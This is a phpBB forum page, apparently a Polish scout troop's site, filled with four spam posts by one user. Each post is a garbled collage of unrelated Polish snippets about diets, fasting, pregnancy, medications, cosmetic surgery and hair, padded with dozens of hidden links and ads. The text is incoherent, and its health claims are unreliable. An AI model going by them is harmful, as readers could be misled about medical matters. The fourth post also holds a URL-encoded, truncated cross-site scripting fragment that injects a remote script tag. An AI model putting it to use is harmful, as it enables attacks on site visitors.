Forum Forum 123 Druyny Harcerskiej Wdrowne Ptaki Strona Gwna Forum 123 Druyny Harcerskiej Wdrowne Ptaki
123 Druyna Harcerska "Wdrowne Ptaki"
 
 FAQFAQ   SzukajSzukaj   UytkownicyUytkownicy   GrupyGrupy   GalerieGalerie   RejestracjaRejestracja 
 ProfilProfil   Zaloguj si, by sprawdzi wiadomociZaloguj si, by sprawdzi wiadomoci   ZalogujZaloguj 

ja znam tą markę od samego początku, mam sporo ich ciuch

 
Napisz nowy temat   Odpowiedz do tematu    Forum Forum 123 Druyny Harcerskiej Wdrowne Ptaki Strona Gwna -> Opinie o stronie
Zobacz poprzedni temat :: Zobacz nastpny temat  
Autor Wiadomo
Juukla




Doczy: 24 Sty 2014
Posty: 729
Przeczyta: 0 tematw

Ostrzee: 0/5
Skd: Finland

PostWysany: Czw 15:19, 27 Mar 2014    Temat postu: ja znam tą markę od samego początku, mam sporo ich ciuch

Wiem,że do tego trzeba sie przyzwyczajac stopniowo,ale ja na to nie mogłam sobie pozwolic,bo musiałam się zajmować dzieckiem.A po tej tabletce to ja siedziałam w wc i nic nie byłam w stanie zrobic. [link widoczny dla zalogowanych] śledzie w oleju z cebulką
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
Od zawsze!
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
tak?
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

O jaką dokładnie placówkę chodzi i czy robią prywatnie. [link widoczny dla zalogowanych] I jak to wyglada?

chodzi mi o to, żeby żołądek sie skurczył i żeby odbic sie od dna bo właśnie je osiągnełam.u mnie nadwaga nie wpływa tylko na wygląd ale ja sie strasznie dołuje psychicznie. No ale to nie jej wina! Żeby nazwać kogoś głupim trzeba mieć ku temu powody , a ja w żadnej mojej wypowiedzi nie dałam ci podstaw byś mogła tak o mnie myśleć . Tzn. 2 tygodnie temu miałam robioną przegrodę i plastykę nosa-był garbaty i krzywy. [link widoczny dla zalogowanych]
Wiedziała co mówi, bo sama miała bardzo ciężkie porody. Raz oglądajac telewizje widziałem cień jak by wielkiego pająka . Nie przesadzajmy, że wszyscy w necie kłamią, bo po co, przecież to i tak anonimowo i nie wiemy, ze to akurat ona ma 57 cm w pasie! niedlugo bd lysa... Do tego można dolać trochę octu. Ale wkurza mnie jak wlosy mi sie pusza a na czarnych bardzo to widac. 2)100-120 g dziennie (30g.
Wiec jesli dziasla bardzo krwawia to warto sobie zrobic zdjecie wszystkich zebow bo paradontoze inaczje jak przez zdjecie sie nie wykryje.
[link widoczny dla zalogowanych]
nie da się zrobić tak, żeby nic nie było widać żadną metodą.
[link widoczny dla zalogowanych]
Pijesz wode, bierzesz witaminy i jesli czujesz sie dobrze jedziesz tak przez 2 tyg.
[link widoczny dla zalogowanych]


Post zosta pochwalony 0 razy
Powrt do gry
Zobacz profil autora
Zobacz poprzedni temat :: Zobacz nastpny temat  
Autor Wiadomo
Juukla




Doczy: 24 Sty 2014
Posty: 729
Przeczyta: 0 tematw

Ostrzee: 0/5
Skd: Finland

PostWysany: Pi 18:14, 04 Kwi 2014    Temat postu: ahh duzo by gadac...

Noszę stanik 75 E lub F(zależy od fasonu) ale już niedługo będę musiała chyba zainwestować w kilka nowych cyckonoszów w rozmiarze G.
[link widoczny dla zalogowanych]
Musze powiedziec ze bol glowy minąl, zawroty zmniejszyły sie. Zajrzyj na strony ze stopki best_bra bo robisz sobie krzywdę.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Zaczęłam A6W od nowa (dzisiaj dzień 1) i mam nadzieję, że na moim brzuszku pojawią się takie same efekty jak ostatnio. [link widoczny dla zalogowanych] ibd 100% najlepszy - pracowałąm już na kilku firmach i on bije wszystkie na głowę dobry jest jeszcze snc w miarę dobry emmi, dobry basic (zobacz nawww.silcare.pl )
aa no i mozecie tez napisac ile Wam potem czasu zajęlo zrzucanie tego Dzięki yogazone. Nawet mi powiedziała że wedlug niej powinnam umowic sie na wizyte za miesiac jak mi troche odrosna. Może ktoś ma jakieś lepsze patenty? Polecam, ps - ktoś pytał - mam 38 lat, Najlepszego w Nowym Roku dla wszystkich [link widoczny dla zalogowanych]
ZDECYDOWNANIE ODRADZAM - DR MAGDALENE TRACZ-HIROWSKA, na energetycznej we wroclawiu, ktora podobno specjalizuje sie w prowadzeniu ciaz. mam pytanko, jak czeszecie swoje loczku? Wielkie wsparcie miałam wtedy w mężu i rodzinie. A CO DO TEJ KOSMETYCZKI BLONDYNKI TO ZGADZAM SIE W 100%, JEST BEZNADZIEJNA. czuje sie ok duzo pije wróć mnóstwo pije moje nerki chyba są szczesliwe tylko mam taka ciezka głowe ale to z powodu dzisiejszej nocy ciekawe jak bedzie dzis ,ale jak zobaczyłam ze waga spada dostałam skrzydeł i nie smiejscie sie chodzę ogladać sie w lustrze sorry chcialam powiedziec, ze sie na to NIE pisze Zawsze jakieś wstawki mogą być.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
jakichs pasozytow?
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

piszcie dziewczyny jeśli macie problem z prolaktyną (lub miałyście) i bromek Wam pomógł...
[link widoczny dla zalogowanych]
najlepiej przełożyć termin o kolejne 2 tygodnie.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
eee gawiedz nie śmiac sie z nas.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

igm (-) [link widoczny dla zalogowanych] witam ja zapraszam do fryzjera w skawinie ceny same nie uwierzycie minimalne strz damskie juz od 11 zlotych a strzyga naprawde dobrze i maja ruch bo naprawde tanio pracuje tam moja kolezanka wiec jak jakies pytania macie albo ciekawe jestescie jakiejs ceny to piszcie na moje gg 9518686
Zaczarowana-polano! Jest to tylko pomoc w znalezieniu pracy a nie dawanie pracy wszystkich któchy chcą. Od pasa w dol to jest masakra a w gornej czesci ciala to jeszcze nie az tak zle.... Okazało się, że nie da się jej normalnie usunąć, i trzeba było dłutować. Ja postawiłam na laser fraksel. [link widoczny dla zalogowanych]
na cześć takiej jednej 7 miesiecznej dzielnej dziewczynki.... bo dieta jest moim zdaniem bardzo rygorystyczna i dla niewielkich Byłam w szoku, zważywszy na to iż miałam delikatne plamienia i myślałam że może miesiaczka tym razem jest inna.Dodatkowo okazało się że mam mięśniaka ok 4,5 cm.Byłam dobrej mysli, ale niestety poroniłam.Teraz jestem kierowana na wyłuszczenie tego mięsniaka.Bardzo się boje, ponieważ lekaż który bedzie mnie operowal, poinformował mnie, ze jeżeli zajdzie taka koniecznośc to również usuną mi macicę, czego sobie nie wyobrażam , bo kocham dzieci i barzdzo chcialabym być matką. miłego dnia To zależy od szybkości organizmu, sprawności pacjenta i zaleceń lekarza co do swiezych blizn to nie mozna na nich wykonywac zabiegow typu dermabrazja czy laser bo to im moze jeszcze bardziej zaszkodzic. - twarz była lekko napięta
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Nie smarując kompletnie niczym dzis jej prawie nie widać Pozdrawiam Was wszystkie przed i po, naprawdę nie ma się czego bać- my same sie nakręcamy,a strach robi wtedy co raz większe oczy!
[link widoczny dla zalogowanych]
confused...a dlaczego, ten chłopak, skoro jesteście razem, kochacie się i planujeice wpsólna przyszłość z Toba nie wyjedzie?
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Jak ktoś się bardzo boi to niech weźmie kartke, szklanke i wyniesie pajączka na dwór, bo zabijanie go gdy już to przeczytałeś/aś byłoby okrutne.Pająki niebezpieczne dla życia człowieka stanowią maleńki odsetek innych ośmionogów - żaden z nich nie żyje w Polsce. [link widoczny dla zalogowanych] czy tam mi doradza fryzurke?
jak niektorzy malo wiedza o zyciu Dzwonisz normalnie do gabinetu, pytasz o najblizszy wolny termin i juz. I człowiek nie wie czego konkretnego moze sie spodziewac. Ja też miewam kryzysy i chwile zwątpienia. Mojego pięknisia nie było, co jednak nie przeszkodziło nam, w późniejszej, świetnej zabawie [link widoczny dla zalogowanych]
Ja odstepy czasu mam duze, ale dla mnie raz na rok takie porzadne sprzatanie organizmu to wrecz cudowny okres i daje zdrowe i czyste zaplecze na dalszych kilkanascie miesiecy. Mogę mieć za to 7 innych Pomocy. Myślę, że trzeba szukać kogoś z wizją czy powołaniem do zawodu, bo np w zakładach sieciowych zawsze obcinają tak samo tak jak trendy mody wskazuja poza tym trzeba za długo czekać. Jem zgodnie z zasadami zawartymi w książce i musze powiedziec ze czuje sie narazie swietnie. Ludzie je nawet hodują. ja zamierzam odpoczywać po zabiegu na maxa a robić ile to będzie konieczne,to wracam na Allegro
dziś miałam ściągania kaminia mam zamiar isc jeszcze na piaskowanie tylko nie wiem jaki trzeba zrobic odstęp czasowy ???
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

stankiewicz jest koło 30stki bądz po trzydziestce, chyba raczej ma 32 tak mi sie przypomina i urodziła Fryderyka.
[link widoczny dla zalogowanych]
Leciutko wybielały... Pogoda niestety bardzo optymistycznie nie nastraja ale ....
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

PROSZĘ O RADĘ!! [link widoczny dla zalogowanych] Mówiła że leczenie trwa różnie, może trwać pare miesięcy lub do zajścia w ciążę, wtedy mam odstawić.
Tak sie zastanawiam czy pujsc w tygodniu do niego i zapytac sie czy on chociaz odrobine sie zmniejszyl? Jeden z nich był odsunięty od zarządzania zespołem w Opolu. Na początku tego topiku podejmowałam pracę w Żywiec Trade, a już niedługo, wszystko na to wskazuje, będę jednym z najdłużej pracujących tam osób. zapomniałam - jeszcze jedno ważne pytanko! On się zrobił strasznie ciepłe kluchy. [link widoczny dla zalogowanych]
Silne srodki antydepresyjne/ Budze sie w nocy lub rano i..... efekty sa natychmiastowe, czasammi po zabiegu utrzymuje się opuchlizna.. Naprawdę warto.Polecamwww.hairxtend.pl Ja również jestem posiadaczką loków. Siema dziewczyny A ona zaczela tak glosno plakac myslalam,ze ze szczescia no i lekarz tez sie jej spytal ,,czemu Pani tak placze ,,a ona ,,bo to czwarta corka,,i dalej
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]


Post zosta pochwalony 0 razy
Powrt do gry
Zobacz profil autora
Zobacz poprzedni temat :: Zobacz nastpny temat  
Autor Wiadomo
Juukla




Doczy: 24 Sty 2014
Posty: 729
Przeczyta: 0 tematw

Ostrzee: 0/5
Skd: Finland

PostWysany: Sob 5:01, 05 Kwi 2014    Temat postu: Nieduza torebka.

Mój ślubny obiera młode ziemniaki i pyta sie czy chcę.
[link widoczny dla zalogowanych]
strasznieboli mnie prawy jajnik i nie wiem co to oznacza ...
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

a i dodam ze nie bralam ŻADNYCH tabletek!!!! [link widoczny dla zalogowanych] witajcie!
Na kamień nazebnego mamy częściowo wpływ - dieta, dokładne czyszczenie zębów; Do ona Coś nie otwiera się ta stronka...Spróbuj wkleić ją jeszcze raz, albo napisz jakie to tworzywo ale sie udalo. 2. [link widoczny dla zalogowanych]
Ja popełniłam ten błąd i tak się spaliłam że nie mogłam nawet siadac bo mnie pupa piekła... Zwlekałam z tym juz długi i najwyższy czas wziąć się do roboty i spróbować. chyba macie cos w tych szafach nie ma kilogramy Sosy sałatkowe przyrządzać z oliwą i sokiem z cytryny, bez cukru. Od 1,5 roku. i zrobie wszystko aby zrealizować marzenie . Od tego momentu jak jestem głodna to boli mnie serce :0
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Nie mogę się jeszcze wypowiedzieć, co do nosa, bo jest jeszcze w gipsie a twarz jest jeszcze trochę spuchnięta i o dziwo bez większych, obrzezków, co do odsysania tłuszczu z pozostałych części ciała to jeszcze nie mam zdania gdyż jestem opuchnięta.
[link widoczny dla zalogowanych]
mam 17 lat i mam na imie nikola, udokumentowane jest ze jestem najstarsza nikola w polsce i na dodatek polka, i nazwisko mi pasuje bo nie jest takie beznadziejne jak Gałka czy gąsinica....
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Troll-Jimmy Dean [link widoczny dla zalogowanych] Poza tym sa osoby z naturalna talia i takie, ktore jej nie maja.
na poczatku tez sie nie wyrabialam i dyszalam jak po biegu na 5 km ale warto pocwiczyc ten oddech! i zależy z czego jest ta firanka i czy powiesiłaś mokrą. jest gejem czy nie jest????? A robicie jakąś dietę do tego albo inne ćwiczenia też? Witam. [link widoczny dla zalogowanych]
czuje sie coraz lepiej, nawet wyśmienicie. Czytałam w różnych czasopismach że wysoki poziom prolaktyny powoduję spadek progesteronu a cop za tym idzie to to ze nawet jakby sie zaszło w ciąże przy wysokiej prolaktynie to ciężo by było utrzymac taka ciąze bo mały progesteron powoduje poronienia Ciekawe ile w tym prawdy?????? bo raz pan Robert jest z carlo a raz z anti i juz sie gubie ehh chce piekne włoskii buu zielono-czerowona to idziemy łepek w łepek. hee!dobrze ze nie jestem sama mam taki problem jak wy!!!!!i myslałm o sciaganiu farby, ale z trego co tu czytam sama juz ie wiem??co robic?????nie nawidze krótkich włosów, ale jeszcze bardziej nie nawidze swojego nowego koloru jak patrze w lusto chce mi sie płakac!!!!!!!!!sama juz nie wiem mysle o scieciu.........jutro idemm do salonu loreal zobacze co mi tam poradza....moze jeszcze mam jakas szanse na normalne zycie.....od kilku dni nie jem i prawie nie spie, tak sie tym wszystkim przejełam!a farbowałam tydzien temu,,,,chciałm tylko takie naturalne włosy jak moje..bo na koncówkach miałm jeszcze blond pasemka!nie wiem juz sama w głwoie mi sie kręci!!!szukam pomocy!!!!!!!!!niech ktos odpowie na wołanie bezbronnej hehhe!jedyny plus ???schudne...juz waze 50 kg przy wzrosie 170cm.......ale wolałam byc problem z chudnieiciem niz z kolorem włosów... i wiele innych ale tylko dlatego ze moja ginekolog nie zorientowala sie ze bralam przez 3 lata tabletki antykoncep i nie powiedziala ze musze przerwac po roku i zrobic badania.
A macie tak czasem ze w swietle wasze zeby wydaja sie wam biale a bez oswietlenia ciemniejsze lub nawet zolte???
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Matrix
[link widoczny dla zalogowanych]
Sozański bierze od studentek 100 zł za wizytę i cytologię.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Witaj big-mamo [link widoczny dla zalogowanych] Idź do brafitterki zanim sobie przez złe biustonosze zniszczysz kręgosłup i piersi.
Jeśli tak, to może napiszesz coś na ten temat? Benusik zostało nam jeszcze 3 miesiące, albo już 7 miesiąc więc brzuszek zacznie rosnąć w końcu. kilka razy, bylam zadowolona do momentu kiedy fryzjerka nie spalila mi wlosow. szkoda rusin dla pedzia,a hanka to zdzira .NIgdy nie robi sie takich rzeczy przyjaciólce,ale jakie ma ona wartości jak drugi rozwód poza nia I dlatego bardzo Was proszę o jakąś wypowiedż w związku z moją głodowką. [link widoczny dla zalogowanych]
nio to chyba wszystko na co ostanio patrzylam Miałam robione paznokcie zelowe, ale były nietrwałe i kruszyły się po kilku dniach.Jednak zaletą pazurków żelowych jest to,że łatwo się w nie wtapia ozdoby ,oraz zel nie ma zapachu, w przeciwieństwie do akrylu - niektórym ten zapach przeszkadza,ale np ja go lubię Zajmuję się robieniem paznokci akrylowych od dłuższego czasu i jestem z nich bardzo zadowolona, świetnie się trzymają i dobrze zrobione swietnie wyglądają Pozdrawiam tom petty-i wont back down Pytasz o nadzieję, hmm... Piję tą pierwszą herbatkę (SPALANIE) już ze cztery dni. moja przygoda z Gynalginem trwa 3 dni, więc postaram się opisać co i jak. gg345737
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Ale wolę myśleć, że 1, bo i tak nie lubię swojego wzrostu.
[link widoczny dla zalogowanych]
worek to wielka chusta, ktora sie owijam przekraczajac prog domku w ktorym zamieszkalismy.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Kilka tygodni temu założyli mi aparat ale od kilku dni przy jednym drucie zaczeło się coś sączyć i boli mnie kolano.Nie wiem czy wziąć antybiotyk zapisany przez lekarza(augumentin) czy macie jakieś inne sposoby na takie dolegliwości. [link widoczny dla zalogowanych] witajcie...
Hehe, jakbyście poznały Pana Rogowskiego w realu i poza serialem to zmieniłybyście zdanie i to szybko. Szczegółły: ten zostanie skasowany tak szybko,jak zostal zalozony no to ja dzis zaczynam 3-ci dzien. Tutaj: [link widoczny dla zalogowanych]
Jeśli bd miały do mnie jakieś pytania proszę pisać. wiemy dobrze że najlepiej nie jesc chleba... Zycze Ci duzo zdrówka i powodzenia na konsultacji! Regine-jestem. Tez nie piszesz .Skrobnij cos kochana Ola K 57 wpisz w gogle ilizarov i na grafika- tam wsyztsko znajdziesz- albo poszukaj stronek internetowych o ilizarovie- tylko sie nie przestrasz bo widok za ladny to nie jest- ale naprawde warto pocierpiec zeby miec pozniej spokoj
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]


Post zosta pochwalony 0 razy
Powrt do gry
Zobacz profil autora
Zobacz poprzedni temat :: Zobacz nastpny temat  
Autor Wiadomo
Juukla




Doczy: 24 Sty 2014
Posty: 729
Przeczyta: 0 tematw

Ostrzee: 0/5
Skd: Finland

PostWysany: Sob 14:34, 05 Kwi 2014    Temat postu: Cześć .

ale na pewno fajna-wsumie wszytskie sa ok.
[link widoczny dla zalogowanych]
tylko pic wode aby ogranizm sie oczyscił Guns N' Roses - Sweet child of mine, Welcome to the jungle,
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Mi ciągle waga stoi jak zaklęta - 100,5. [link widoczny dla zalogowanych] Toska dierre to tylko niewiele droższe drzwi od innych, a mają niesamowicie dużo zalet jeśli chodzi o ich budowę, no i to wykończenie Polecam raz jeszcze.
to imię jest beznadziejne nieprzewidywalność zachowań i utrata kontroli nad nimi, Ważne jest żeby tam się nie dostał pot! A powiedz, tylko szczerze,czy ty teraz juz w ogole nie czujesz z e masz nie swoje piersi? Pewnie zdecyduję się na któryś z tych orbitreków: [link widoczny dla zalogowanych]
Naprawdę warto! Tam jest kilka rodzajów tego płynu ja mam na mysli taki płyn, który włewa się do wanny 1-2 koreczków, woda robi się biała jak mleczko, ten płyn zawiera środki myjące i nawilżające. tofka - tak, jest małomówny i wiele lat praktyki. Dziekuje Ci bardzo za szybka odpowiedz a moze wiesz ile powinnam brac ten lek(Gravistat 250)??? W ogóle zwolnij obroty. Czesc dziewczyny.Okres juz mi sie spoznia 1,5 tyg i robilam juz 2 testy i oba pokazaly mi 2 kreski tylko jedna kreska bardziej wyrazna od drugiej-ale dwie.Odczowam dolegliwosci typu czeste oddawanie moczu po pare kropelek, bule i klucia w lewym boku i bol piersi szczegolnie przy dotyku.Podpowiedzcie mi cos na temat tych nie wyraznych 2 kresek na tescie ciazowym.Pozdrawiam Pozdrawiam
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Zakochał się w prostytutce z agencji Blue Star w Gdyni Tatianie.
[link widoczny dla zalogowanych]
Co do samych siniaków i krwiakow to polecam nastepnym razem przed zabiegiem zrobienie sobie takiej kuracji [link widoczny dla zalogowanych] winogron Nie dowiedzialam sie tak naprawde skad to krwawienie i dlaczego.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

-martka- ---> z usług znajomej wizażystki na pewno zrezygnuję [link widoczny dla zalogowanych] nie mam zdania
Co dokłądnie robiła Śleszynska,co mówiła,jak się zachowywała?Dlaczego uważasz,że była pijana lub coś brała? niezdolność psychiczna do podjęcia obowiązków małzeńskich (cos jak niezgodność charakterów przy rozwodzie cywilnym, czyli powód - wytrych). Kilka lat temu takie zasady wypróbowałam na sobie i trwale zmniejszyłam swoją wagę. mam taki problem. [link widoczny dla zalogowanych] cout.com&q=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E% 3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2 [link widoczny dla zalogowanych]
Tak Sforo, zgadzam się z każdym słowem. Moze dla nas te szczesliwe dni beda miały swoj czas w przyszlosci i kiedys naprawde bedziemy sie cieszyc zyciem. czy ktos z was przeszywal już jeansy?? uda od przodu już prawie pozbyły się cellulitu a kolana wyglądają całkiem spoko. Najpierw była zszokowana, a później stwierdziła śmiejąc się że ona już nie ma do mnie siły i żeby mi nie przyszło ,,narazie robić w nosi brwi itp. Jestem ciekawa jak u Was wyglada sytuacja z wychodzeniem z glodowki. załamka :/
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

anieleczka,jezeli to cie okropnie szczypie,swedzi i piecze,to pewnie tygrzyk paskowany,spolczuje ci bo sama jestem ugryziona pszez to ochydne paskudctwa,
[link widoczny dla zalogowanych]
...wyobrażeń szczęśliwości w Europie jakie zrealizuje za pomocą narzędzia jakim jesteś.... Szybko i boleśnie ...
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

bardzo prosze o odpowiedz i z gory dziekuje [link widoczny dla zalogowanych] 1.
Kasioolka no masz rację. co prawda w ciagu dnia przeszlo, i mam zamiar dzis wziac,ale jak jutro rano tak bedzie to nie wiem czy nie wybiore sie do lekarza.. z checia bym poczytala ksiazke,o ktorej piszesz,ale najpierw musze poprosic kogos z rodziny by mi ja kupil i wyslal, tak samo te testy paskowe,bo pewnie takie tez tu znajde ale w holandii to nie wszystko mozna sobie kupic w aptece jak u nas bez przepisu lekarza. Candida. U nas taka sama pogoda, niby słońce świeci i te 25 stopni może i jest, ale wieje taki wiatr, że temperatura nie jest wcale odczuwalna i moje dzieci dziś na długi rękaw chodzą. [link widoczny dla zalogowanych]
zastanawiam się nad jego zakupem, ale chciałabym poznać Wasze zdanie.. Mam jeszcze jedno pytanie. bo mam to już kolejny raz .. a jakie sa obajwy miesniakow,,, Ona nie nakłada na usta nawet błyszczyku, a jak już coś nałoży to są tak duże i piękne, że widać je z daleka Pan Daniel był miły,nie było żadnych spięć, zrobił to, o co go poprosiłam. dzidziuch Ania, tylko \i\ sie mi zjadlo taki ze mnie lakonczuch aaa bo wlasnie niedlugo pora na jedzonko
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Strasznie mnie to męczy, choć jak czytam niektóre wypowiedzi to podtrzymują mnie na duchu.
[link widoczny dla zalogowanych]
Aha jeszcze jedno ...studio jest bardzo w clubowym stylu POLECAM!!!
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

spowodowanym niedoczynnascia tarczycy?? [link widoczny dla zalogowanych] Jablczynska 55kg
Współczuję kobietom, które chcąc podobać się rujnują sobie zdrowie (szpilki, goły krzyż czy brzuchy nawet zimą itd.). U mnie to w zasadzie nawet nie można nazwać tego nieregularnymi miesiączkami, bo one po prostu występowały sobie jak chciały, a do tego byłam i zresztą nadal jestem strasznie nerwowa. Zabieg oczyszczania twarzy, przeprowadzono bardzo profesjonalnie. 3) ej facet nie jest slodziutki bo to nie cukierek bynajmniej. dzieki wpisujcie się smiało a ja bede zasysać filmiki [link widoczny dla zalogowanych]
Naprawdę można zrobić tak akryle, by były równie cieniutkie, wystarczy nałożyć mniej masy, a jeśli zachowa się wzorcowe proporcje (czyli wzmacniam linię stresu, która znajduję się mniej więcej w okolicy między środkiem długości płytki a trzy,czwarte tej długości, tworząc lekki garbek) są one tak samo trwałe jak żele. nie jesteś pełnoletnia ? w Polsce tez jest, ale z tego co wiem to tylko dla mezczyzn. Pozdrawiam Uzdrowisko wstydliwych dolegliwości - ZONE REALITY piątek o godz. Pozdrawiam dziewczyny jeśli będziecie szukac pomocy tam :
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
Dolegliwości mogą nieco złagodzić ziołowe nasiadówki np.


Post zosta pochwalony 0 razy
Powrt do gry
Zobacz profil autora
Wywietl posty z ostatnich:   
Napisz nowy temat   Odpowiedz do tematu    Forum Forum 123 Druyny Harcerskiej Wdrowne Ptaki Strona Gwna -> Opinie o stronie Wszystkie czasy w strefie EET (Europa)
Strona 1 z 1

 
Skocz do:  
Moesz pisa nowe tematy
Moesz odpowiada w tematach
Nie moesz zmienia swoich postw
Nie moesz usuwa swoich postw
Nie moesz gosowa w ankietach

fora.pl - za wasne forum dyskusyjne za darmo
Powered by phpBB © 2001, 2005 phpBB Group
Regulamin